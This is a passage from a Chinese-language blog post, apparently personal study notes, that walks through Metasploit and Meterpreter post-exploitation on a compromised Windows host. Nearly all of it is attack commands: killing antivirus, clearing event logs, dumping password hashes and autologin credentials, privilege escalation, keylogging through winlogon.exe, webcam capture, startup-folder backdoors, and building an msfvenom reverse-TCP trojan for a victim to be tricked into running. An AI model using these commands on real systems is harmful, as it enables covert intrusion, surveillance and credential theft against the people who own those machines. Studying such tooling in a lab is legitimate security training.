class="line"><span class="meta prompt_"></span></span><br><span class="line"><span class="meta prompt_">#</span><span class="language-bash">会自动连接192.168.100.132的8888端口，缺点是容易被杀毒软件查杀</span> </span><br><span class="line">run exploit/windows/local/persistence lhost=192.168.100.132 lport=8888        </span><br><span class="line"><span class="meta prompt_">#</span><span class="language-bash">将192.168.11.13的3389端口转发到本地的9999端口上，这里的192.168.100.158是获取权限的主机的ip地址</span></span><br><span class="line">portfwd add -l 9999 -r 192.168.100.158 -p 3389     		</span><br><span class="line">clearev                                                 #清除日志</span><br></pre></td></tr></table></figure>

<p>我们输入： shell即可切换到目标主机的windows cmd_shell里面：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">shell         <span class="comment">#获取目标主机的cmd_shell权限</span></span><br><span class="line">chcp 65001    <span class="comment">#这里为了避免目标主机cmd_shell字符乱码，设置目标主机命令行的字符编码，65001是UTF-8</span></span><br></pre></td></tr></table></figure>

<p>要想从目标主机shell退出到<code>meterpreter</code> ，我们只需输入：<code>exit</code></p>
<p>从meterpreter退出到MSF框架:  我们只需输入：background </p>
<p><img src="https://gitee.com/ljh00928/csdn/raw/master/img/image-20250408162805517.png" alt="image-20250408162805517"></p>
<p>查看前面获得的<code>meterpreter_shell</code>会话，最前面的数字是会话的id：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">sessions  -l</span><br></pre></td></tr></table></figure>

<p><img src="https://gitee.com/ljh00928/csdn/raw/master/img/image-20250408162851667.png" alt="image-20250408162851667"></p>
<p>输入sessions [id号]即可进入相应的<code>meterpreter_shell</code>中：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">sessions 3</span><br></pre></td></tr></table></figure>

<p><img src="https://gitee.com/ljh00928/csdn/raw/master/img/image-20250408162947189.png" alt="image-20250408162947189"></p>
<h3 id="7-1-Post-后渗透模块"><a href="#7-1-Post-后渗透模块" class="headerlink" title="7.1 Post 后渗透模块"></a><strong>7.1 Post 后渗透模块</strong></h3><p>该模块主要用于在取得目标主机系统远程控制权后，进行一系列的后渗透攻击动作。</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">run post/windows/manage/migrate                			#自动进程迁移</span><br><span class="line">run post/windows/gather/checkvm                			#查看目标主机是否运行在虚拟机上</span><br><span class="line">run post/windows/manage/killav                			#关闭杀毒软件</span><br><span class="line">run post/windows/manage/enable_rdp            			#开启远程桌面服务</span><br><span class="line">run post/windows/manage/autoroute              			#查看路由信息</span><br><span class="line">run post/windows/gather/enum_logged_on_users    		#列举当前登录的用户</span><br><span class="line">run post/windows/gather/enum_applications       		#列举应用程序</span><br><span class="line">run post/windows/gather/credentials/windows_autologin 	#抓取自动登录的用户名和密码</span><br><span class="line">run post/windows/gather/smart_hashdump               	#dump出所有用户的hash</span><br></pre></td></tr></table></figure>

<p>输入：sysinfo 查看目标主机的信息:</p>
<p><img src="https://gitee.com/ljh00928/csdn/raw/master/img/image-20250408163406636.png" alt="image-20250408163406636"></p>
<h3 id="7-2-查看主机是否运行在虚拟机上"><a href="#7-2-查看主机是否运行在虚拟机上" class="headerlink" title="7.2 查看主机是否运行在虚拟机上:"></a><strong>7.2 查看主机是否运行在虚拟机上:</strong></h3><p>查看主机是否运行在虚拟机上，可以看出主机是在虚拟机环境</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">run post/windows/gather/checkvm</span><br></pre></td></tr></table></figure>

<p><img src="https://gitee.com/ljh00928/csdn/raw/master/img/image-20250408163511981.png" alt="image-20250408163511981"></p>
<h3 id="7-3-关闭杀毒软件："><a href="#7-3-关闭杀毒软件：" class="headerlink" title="7.3 关闭杀毒软件："></a><strong>7.3 关闭杀毒软件：</strong></h3><p>拿到目标主机的shell后第一件事就是关闭掉目标主机的杀毒软件，通过命令</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">run post/windows/manage/killav</span><br></pre></td></tr></table></figure>

<h3 id="7-4-获取目标主机的详细信息："><a href="#7-4-获取目标主机的详细信息：" class="headerlink" title="7.4 获取目标主机的详细信息："></a><strong>7.4 获取目标主机的详细信息：</strong></h3><p>它将目标机器上的常见信息收集起来然后下载保存在本地</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">run scraper </span><br></pre></td></tr></table></figure>

<h3 id="7-5-访问文件系统："><a href="#7-5-访问文件系统：" class="headerlink" title="7.5 访问文件系统："></a><strong>7.5 访问文件系统：</strong></h3><p>Meterpreter支持非常多的文件系统命令（基本跟Linux系统命令类似），一些常用命令如下</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">pwd</span>     <span class="comment">#查看当前目录</span></span><br><span class="line"><span class="built_in">cd</span>      <span class="comment">#切换目标目录；</span></span><br><span class="line"><span class="built_in">cat</span>     <span class="comment">#读取文件内容；</span></span><br><span class="line"><span class="built_in">rm</span>      <span class="comment">#删除文件；</span></span><br><span class="line">edit    <span class="comment">#使用vim编辑文件</span></span><br><span class="line"><span class="built_in">ls</span>      <span class="comment">#获取当前目录下的文件；</span></span><br><span class="line"><span class="built_in">mkdir</span>   <span class="comment">#新建目录；</span></span><br><span class="line"><span class="built_in">rmdir</span>   <span class="comment">#删除目录； </span></span><br></pre></td></tr></table></figure>

<h3 id="7-6-上传-下载文件："><a href="#7-6-上传-下载文件：" class="headerlink" title="7.6 上传&#x2F;下载文件："></a><strong>7.6 上传&#x2F;下载文件：</strong></h3><p>下载文件：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">download  file</span><br></pre></td></tr></table></figure>

<p>上传文件:</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">upload  file </span><br></pre></td></tr></table></figure>

<h3 id="7-7-权限提升："><a href="#7-7-权限提升：" class="headerlink" title="7.7 权限提升："></a><strong>7.7 权限提升：</strong></h3><p>有的时候，你可能会发现自己的 Meterpreter 会话受到了用户权限的限制，而这将会严重影响你在目标系统中的活动。比如说，修改注册表、安装后门或导出密码等活动都需要提升用户权限，而Meterpreter给我们提供了一个 getsystem 命令，它可以使用多种技术在目标系统中实现提权。</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">#自动提权为系统权限</span><br><span class="line">getsystem</span><br><span class="line">#命令可以获取当前用户的信息，可以看到，当我们使用 getsystem进行提权后，用户权限为  NT AUTHORITY\SYSTEM ，这个也就是Windows的系统权限。</span><br><span class="line">getuid</span><br></pre></td></tr></table></figure>

<p>注：执行getsystem命令后，会显示错误，但是其实已经运行成功了！</p>
<h3 id="7-8-获取用户密码"><a href="#7-8-获取用户密码" class="headerlink" title="7.8 获取用户密码"></a><strong>7.8 获取用户密码</strong></h3><p>参考链接：<a target="_blank" rel="noopener" href="https://blog.csdn.net/weixin_45588247/article/details/119519411?spm=1001.2014.3001.5501">https://blog.csdn.net/weixin_45588247/article/details/119519411?spm=1001.2014.3001.5501</a></p>
<h3 id="7-9-运行程序："><a href="#7-9-运行程序：" class="headerlink" title="7.9 运行程序："></a><strong>7.9 运行程序：</strong></h3><p>先查看目标主机安装了哪些应用：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">run post/windows/gather/enum_applications </span><br></pre></td></tr></table></figure>

<p>在meterpreter_shell命令行执行目标系统中的应用程序：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">#execute命令用法：</span><br><span class="line">execute [参数] -f 指定的可执行文件</span><br><span class="line"></span><br><span class="line">-f：指定可执行文件</span><br><span class="line">-H：创建一个隐藏进程</span><br><span class="line">-a：传递给命令的参数</span><br><span class="line">-i：跟进程进行交互</span><br><span class="line">-m：从内存中执行</span><br><span class="line">-t：使用当前伪造的线程令牌运行进程</span><br><span class="line">-s：在给定会话中执行进程</span><br></pre></td></tr></table></figure>

<p><img src="https://gitee.com/ljh00928/csdn/raw/master/img/image-20250408165109773.png" alt="image-20250408165109773"></p>
<h3 id="7-11-屏幕截图"><a href="#7-11-屏幕截图" class="headerlink" title="7.11 屏幕截图"></a><strong>7.11 屏幕截图</strong></h3><p>1、截图目标主机屏幕，可以看到，图片被保存到了<code>/root/桌面/</code>目录下</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">screenshot           <span class="comment">#截图目标主机屏幕</span></span><br></pre></td></tr></table></figure>

<p><img src="https://gitee.com/ljh00928/csdn/raw/master/img/image-20250408165236346.png" alt="image-20250408165236346"></p>
<h3 id="7-12-创建一个新账号："><a href="#7-12-创建一个新账号：" class="headerlink" title="7.12 创建一个新账号："></a><strong>7.12 创建一个新账号：</strong></h3><p>先查看目标主机有哪些用户：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">run post/windows/gather/enum_logged_on_users </span><br></pre></td></tr></table></figure>

<p>在目标系统中创建一个新的用户账号的方法一：</p>
<p>注：这个命令会创建用户，并把他添加到 Administrators 组中，这样该用户就拥有远程桌面的权限了。</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">run getgui -u 用户 -p 密码</span><br><span class="line">-u: 指定用户</span><br><span class="line">-p: 指定密码</span><br></pre></td></tr></table></figure>

<p>在目标系统中创建一个新的用户账号的方法二：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">enable_rdp脚本:</span><br><span class="line">run post/windows/manage/enable_rdp USERNAME=cherry PASSWORD=123456    #添加用户</span><br><span class="line">run post/windows/manage/enable_rdp                                    #开启远程桌面</span><br><span class="line">run post/windows/manage/enable_rdp FORWARD=true LPORT=6662            #将3389端口转发到6662</span><br></pre></td></tr></table></figure>

<h3 id="7-13-启用远程桌面："><a href="#7-13-启用远程桌面：" class="headerlink" title="7.13 启用远程桌面："></a><strong>7.13 启用远程桌面：</strong></h3><ul>
<li><p>当我们新添加的用户已经拥有远程桌面之后，我们就可以使用这个账号凭证来开启远程桌面会话了。</p>
</li>
<li><p>首先，我们需要确保目标Windows设备开启了远程桌面功能（需要开启多个服务），我们输入：<code>run post/windows/manage/enable_rdp</code>命令可以开启远程桌面。</p>
</li>
<li><p>在开启远程桌面会话之前，我们还需要使用<code>idletime命令</code>检查远程用户的空闲时长：</p>
</li>
</ul>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">idletime</span><br></pre></td></tr></table></figure>

<h3 id="7-14-键盘记录"><a href="#7-14-键盘记录" class="headerlink" title="7.14 键盘记录:"></a><strong>7.14 键盘记录:</strong></h3><p>Meterpreter还可以在目标设备上实现键盘记录功能，键盘记录主要涉及以下三种命令：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">keyscan_start： #开启键盘记录功能，开关键盘记录功能后目标输入的内容我们就通过keyscan_dump命令在Meterpreter里面进行查看；</span><br><span class="line">keyscan_dump：  #显示捕捉到的键盘记录信息</span><br><span class="line">keyscan_stop：  #停止键盘记录功能</span><br></pre></td></tr></table></figure>

<p>注：在使用键盘记录功能时，通常需要跟目标进程进行绑定，接下来我们介绍如何绑定进程，然后获取该进程下的键盘记录。</p>
<h3 id="7-15-进程迁移："><a href="#7-15-进程迁移：" class="headerlink" title="7.15 进程迁移："></a><strong>7.15 进程迁移：</strong></h3><p>Meterpreter 既可以单独运行，也可以与其他进程进行绑定。因此，我们可以让Meterpreter与类似explorer.exe这样的进程进行绑定，并以此来实现持久化。</p>
<p>在下面的例子中，我们会将<code>Meterpreter</code>跟 <code>winlogon.exe</code>绑定，并在登录进程中捕获键盘记录，以获得用户的密码。</p>
<p>首先，我们需要使用：<code>ps</code> 命令查看目标设备中运行的进程：</p>
<p><img src="https://gitee.com/ljh00928/csdn/raw/master/img/image-20250408170914111.png" alt="image-20250408170914111"></p>
<p>我们可以使用：<code>getpid</code> 查看我们当前的进程id：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">getid</span><br></pre></td></tr></table></figure>

<p>使用：<code>migrate</code>+<code>目标进程ID</code>命令来绑定目标进程id，可以看到通过进程迁移后，当前的<code>Meterpreter</code>的<code>pid</code>已经和 <code>winlogon.exe</code>一样了</p>
<p><img src="https://gitee.com/ljh00928/csdn/raw/master/img/image-20250408171334516.png" alt="image-20250408171334516"></p>
<p>这里绑定目标pid的时候，经常会断了shell。进程迁移后会自动关闭原来Meterpreter进程，没有关闭可使用 <code>kill pid</code> 命令关闭进程。</p>
<p>或者使用自动迁移进程（<code>run post/windows/manage/migrate</code>）命 令，系统会自动寻找合适的进程然后迁移。</p>
<h3 id="7-16-禁止目标主机使用键盘鼠标"><a href="#7-16-禁止目标主机使用键盘鼠标" class="headerlink" title="7.16 禁止目标主机使用键盘鼠标"></a><strong>7.16 禁止目标主机使用键盘鼠标</strong></h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">uictl  disable(enable) keyboard  #禁止(允许)目标使用键盘</span><br><span class="line">uictl  disable(enable) mouse     #禁止(允许)目标使用鼠标</span><br></pre></td></tr></table></figure>

<h3 id="7-17-用目标主机摄像头拍照："><a href="#7-17-用目标主机摄像头拍照：" class="headerlink" title="7.17 用目标主机摄像头拍照："></a><strong>7.17 用目标主机摄像头拍照：</strong></h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">webcam_list    #获取目标系统的摄像头列表</span><br><span class="line">webcam_snap    #从指定的摄像头，拍摄照片</span><br><span class="line">webcam_stream  #从指定的摄像头，开启视频</span><br></pre></td></tr></table></figure>

<h3 id="7-18-常用扩展库介绍"><a href="#7-18-常用扩展库介绍" class="headerlink" title="7.18 常用扩展库介绍"></a><strong>7.18 常用扩展库介绍</strong></h3><p>meterpreter中不仅有基本命令还有很多扩展库，下面就介绍一下常用的扩展库的查看方法。</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">load/use     #加载模块</span><br><span class="line">load -l      #列出所有可用的扩展</span><br><span class="line">load -help   #帮助；说明</span><br><span class="line">run          #执行一个已有的模块</span><br></pre></td></tr></table></figure>

<p>注：这里输入run后，双击Tab键列出所有的已有的脚本；</p>
<h3 id="7-19-生成持续性后门（重点）："><a href="#7-19-生成持续性后门（重点）：" class="headerlink" title="7.19 生成持续性后门（重点）："></a><strong>7.19 生成持续性后门（重点）：</strong></h3><p>因为<code>meterpreter</code> 是基于<code>内存DLL</code>建立的连接，所以，只要目标主机关机，我们的连接就会断。总不可能我们每次想连接的时候，每次都去攻击，然后再利用 meterpreter 建立连接。所以，我们得在目标主机系统内留下一个持续性的后门，只要目标主机开机了，我们就可以连接到该主机。</p>
<p>建立持续性后门有两种方法，一种是通过<code>启动项启动(persistence)</code>，一种是通过<code>服务启动(metsvc)</code></p>
<h3 id="7-19-1-启动项启动："><a href="#7-19-1-启动项启动：" class="headerlink" title="7.19.1 启动项启动："></a><strong>7.19.1 启动项启动：</strong></h3><p>启动项启动的话，我们先生成一个后门木马。</p>
<p>需要去学习怎么生成后门木马 todo</p>
<p>然后放到<code>windows的启动目录</code>中：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">C:\Users\$username$\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup</span><br></pre></td></tr></table></figure>

<p>这样这个后门每次开机就都能启动了，然后我们只要相连就监听相应的端口就行了。</p>
<h1 id="msf制作反弹shell"><a href="#msf制作反弹shell" class="headerlink" title="msf制作反弹shell"></a>msf制作反弹shell</h1><h2 id="1-制作反弹shell-exe文件"><a href="#1-制作反弹shell-exe文件" class="headerlink" title="1.制作反弹shell-exe文件"></a>1.制作反弹shell-exe文件</h2><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">msfvenom -p windows/meterpreter/reverse_tcp LHOST=kaili的ip地址 LPORT=5577 -f exe -o /root/test.exe</span><br><span class="line"></span><br><span class="line">LHOST    kaili的ip地址</span><br><span class="line">LPORT    为反弹端口</span><br><span class="line">test.exe 为生成文件</span><br></pre></td></tr></table></figure>

<p>木马生成成功：</p>
<p><img src="https://gitee.com/ljh00928/csdn/raw/master/img/image-20250411110707974.png" alt="image-20250411110707974"></p>
<p>然后把木马传输到主机</p>
<h2 id="2-控制端启动msfconsole，获取监听"><a href="#2-控制端启动msfconsole，获取监听" class="headerlink" title="2.控制端启动msfconsole，获取监听"></a>2.控制端启动msfconsole，获取监听</h2><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">msfconsole</span><br><span class="line">msf5 &gt; use exploit/multi/handler</span><br><span class="line">msf5 exploit(multi/handler) &gt; <span class="built_in">set</span> PAYLOAD windows/meterpreter/reverse_tcp</span><br><span class="line">msf5 exploit(multi/handler) &gt; <span class="built_in">set</span> LHOST 0.0.0.0</span><br><span class="line">msf5 exploit(multi/handler) &gt; <span class="built_in">set</span> LPORT 5577</span><br><span class="line">msf5 exploit(multi/handler) &gt; run</span><br><span class="line"></span><br><span class="line">一句话：</span><br><span class="line">handler -p windows/meterpreter/reverse_tcp -H kaili的ip地址 -P 5577</span><br></pre></td></tr></table></figure>

<p>这时候只需要诱惑点击我们的test.exe文件。我们就可以进入到meterpreter界面了。</p>
<h2 id="3-反弹成功"><a href="#3-反弹成功" class="headerlink" title="3.反弹成功"></a>3.反弹成功</h2><p>因为我win7拖拽文件有问题。这里我使用Win10做靶机。</p>
<p>成功获取到对话：</p>
<p><img src="https://gitee.com/ljh00928/csdn/raw/master/img/image-20250411111842192.png" alt="image-20250411111842192"></p>
<p>我们输入： <code>shell</code>即可切换到目标主机的<code>windows cmd_shell</code>里面：</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">shell         #获取目标主机的cmd_shell权限</span><br><span class="line">chcp 65001    #这里为了避免目标主机cmd_shell字符乱码，设置目标主机命令行的字符编码，65001是UTF-8</span><br></pre></td></tr></table></figure>






        </div>

        
            <section class="post-copyright">
                
                    <p class="copyright-item">
                        <span>Author:</span>
                        <span>John Doe</span>
                    </p>
                
                
                    <p class="copyright-item">
                        <span>Permalink:</span>
                        <span><a href="http://example.com/2025/04/11/msf/">http://example.com/2025/04/11/msf/</a></span>
                    </p>
                
                
                    <p class="copyright-item">
                        <span>License:</span>
                        <span>Copyright (c) 2019 <a target="_blank" rel="noopener" href="http://creativecommons.org/licenses/by-nc/4.0/">CC-BY-NC-4.0</a> LICENSE</span>
                    </p>
                
                
                     <p class="copyright-item">
                         <span>Slogan:</span>
                         <span>Do you believe in <strong>DESTINY</strong>?</span>
                     </p>
                

            </section>
        
        <section class="post-tags">
            <div>
                <span>Tag(s):</span>
                <span class="tag">
                    
                </span>
            </div>
            <div>
                <a href="javascript:window.history.back();">back</a>
                <span>· </span>
                <a href="/">home</a>
            </div>
        </section>
        <section class="post-nav">
            
            
            <a class="next" rel="next" href="/2025/04/11/hello-world/">Hello World</a>
            
        </section>


    </article>
</div>

            </div>
            <footer id="footer" class="footer">
    <div class="copyright">
        <span>© John Doe | Powered by <a href="https://hexo.io" target="_blank">Hexo</a> & <a href="https://github.com/Siricee/hexo-theme-Chic" target="_blank">Chic</a></span>
    </div>
</footer>

    </div>
</body>

</html>